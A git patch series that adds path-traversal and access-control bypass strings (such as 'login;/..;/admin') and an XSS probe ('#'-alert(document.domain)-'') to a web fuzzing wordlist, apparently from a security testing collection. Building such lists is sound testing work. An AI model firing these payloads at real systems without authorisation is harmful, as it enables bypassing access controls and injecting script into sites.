From 561d6236c207b5832a369e8b5ecbddeb47a7df28 Mon Sep 17 00:00:00 2001 From: Kirill Z Date: Mon, 27 Apr 2020 20:09:53 +0700 Subject: [PATCH 1/2] Update the fuzz-Bo0oM.txt with more ';' --- Fuzzing/fuzz-Bo0oM.txt | 12 +++++++++++- 1 file changed, 11 insertions(+), 1 deletion(-) diff --git a/Fuzzing/fuzz-Bo0oM.txt b/Fuzzing/fuzz-Bo0oM.txt index f7d6f23..75ef66f 100644 --- a/Fuzzing/fuzz-Bo0oM.txt +++ b/Fuzzing/fuzz-Bo0oM.txt @@ -7,7 +7,17 @@ %3f/ %C0%AE%C0%AE%C0%AF %ff/ -+CSCOU+/../+CSCOE+/files/file_list.json +CSCOU+/../+CSCOE+/files/file_list.json +;/..;/ +..;/..;/ +foo;name=foo/ +status/..;/ +..;/x +login;foo/ +login;/ +login;/..;/admin +;/ +; ..;/ .7z .access From 6466bd0ed2fbd76590813c8da61fa0f55b155cfb Mon Sep 17 00:00:00 2001 From: Kirill Z Date: Mon, 27 Apr 2020 20:19:33 +0700 Subject: [PATCH 2/2] Add more XSS --- Fuzzing/fuzz-Bo0oM.txt | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/Fuzzing/fuzz-Bo0oM.txt b/Fuzzing/fuzz-Bo0oM.txt index 75ef66f..e83c751 100644 --- a/Fuzzing/fuzz-Bo0oM.txt +++ b/Fuzzing/fuzz-Bo0oM.txt @@ -7,7 +7,11 @@ %3f/ %C0%AE%C0%AE%C0%AF %ff/ -CSCOU+/../+CSCOE+/files/file_list.json ++CSCOU+/../+CSCOE+/files/file_list.json +# +%23 +#3ooo%25 +#'-alert(document.domain)-' ;/..;/ ..;/..;/ foo;name=foo/